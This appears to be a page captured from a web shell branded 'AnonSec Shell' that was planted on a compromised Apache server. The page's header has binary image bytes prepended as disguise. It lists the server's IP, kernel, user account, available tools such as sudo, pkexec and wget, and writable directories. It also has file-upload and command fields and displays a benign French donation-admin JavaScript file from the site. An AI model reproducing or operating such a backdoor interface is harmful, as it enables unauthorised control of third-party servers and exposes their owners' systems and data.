%PDF-1.3 %��C ��C ����"#Qr����&1!A"2qQa��� ?�y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI�I��iM��r�N&"KgX:��nTJnLK��@!�-� ���m�;�g���&�hw���@�ܗ 9�-�.�1 AnonSec Shell
AnonSec Shell
Server IP : 192.175.98.165  /  Your IP : 216.73.216.219
Web Server : Apache
System : Linux server.tobedev.com 4.18.0-553.72.1.el8_10.x86_64 #1 SMP Tue Sep 2 06:07:48 EDT 2025 x86_64
User : meir5web ( 1019)
PHP Version : 7.4.33
Disable Function : passthru,shell_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/meir5web/public_html/admin_dons/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/meir5web/public_html/admin_dons/script.js
  // Données fictives pour démonstration
  const rows = [];
  for (let i = 1; i <= 53; i++) {
    rows.push({
      id: i,
      nom: "Utilisateur " + i,
      email: "utilisateur" + i + "@exemple.com",
      date: "26-06-2025"
    });
  }

  const rowsPerPage = 10;
  let currentPage = 1;


  function closeModal(e) {
    document.getElementById("modal").style.display = "none";
  }
  
  function openModal(id) {
  let modal = document.getElementById("modal");
  let content = document.querySelector(".modal-content");

  // Ajout du contenu
  document.getElementById("modal-body").innerHTML = $("#details"+id).html();

  // Affiche le modal
  modal.style.display = "flex";

  // Réinitialise l'animation si déjà affiché
  content.style.animation = "none";
  void content.offsetWidth; // force le DOM à recalculer
  content.style.animation = "slideIn 0.3s ease-out forwards";
  }
  
  function genereCerfa(id)
  {
	  $('body').append(
			'<div id="loading-overlay">' +
				'<div class="spinner"></div>' +
			'</div>'
		);

		// Masquer la superposition quand le bouton est cliqué (pour le test)
		$('#hideOverlayBtn').on('click', function() {
			$('#loading-overlay').fadeOut(400, function() {
				$('body').css('overflow', 'auto'); // Réactiver le défilement
			});
		});
			
	  req = {'id':id};
		$.ajax({
				   type: "POST",
				   url: "genereCerfa.php?id="+id,
				   data:req ,
				   success: function(x){
						window.location.reload();
				  }
				 });
  }
  
$(function() {
  $.datepicker.setDefaults($.datepicker.regional["fr"]);

  var dateFormat = "dd/mm/yy";

  var from = $("#date_from")
    .datepicker({
      dateFormat: dateFormat,
      changeMonth: true,
      changeYear: true,
      onClose: function(selectedDate) {
        $("#date_to").datepicker("option", "minDate", selectedDate);
      }
    });

  var to = $("#date_to")
    .datepicker({
      dateFormat: dateFormat,
      changeMonth: true,
      changeYear: true,
      onClose: function(selectedDate) {
        $("#date_from").datepicker("option", "maxDate", selectedDate);
      }
    });
});

Anon7 - 2022
AnonSec Team